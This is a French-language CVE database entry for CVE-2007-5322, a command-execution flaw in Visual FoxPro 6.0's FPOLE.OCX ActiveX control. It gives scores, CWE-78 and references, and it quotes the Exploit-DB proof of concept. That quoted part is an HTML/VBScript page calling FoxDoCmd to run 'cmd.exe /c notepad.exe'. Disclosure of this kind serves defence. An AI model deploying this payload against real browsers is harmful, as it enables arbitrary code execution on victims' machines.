CVE-2007-5322 : Détail

CVE-2007-5322

OS Command Injection
A03-Injection
35.43%V4
Network
2007-10-09
20h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Insecure method vulnerability in the FPOLE.OCX 6.0.8450.0 ActiveX control in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary programs by specifying them as an argument to the FoxDoCmd function.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4506

Date de publication : 2007-10-08 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> <b>Technical Details File: FPOLE.OCX Version: 6.0.8450.0 MD5: E9A1D8CFE6C791BA76B7343FA39752FB Marked as: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller</b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 When I released this <a href='http://www.milw0rm.com/exploits/4369'>http://www.milw0rm.com/exploits/4369</a> I never thought it was possible to use the "FoxDoCmd()" method to run applications passed as argument but... ----------------------------------------------------------------------------- <object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something" End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-10-09]

Products Mentioned

Configuraton 0

Microsoft>>Visual_foxpro >> Version 6.0

Références

https://www.exploit-db.com/exploits/4506
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/38487
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/27165
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/25977
Tags : vdb-entry, x_refsource_BID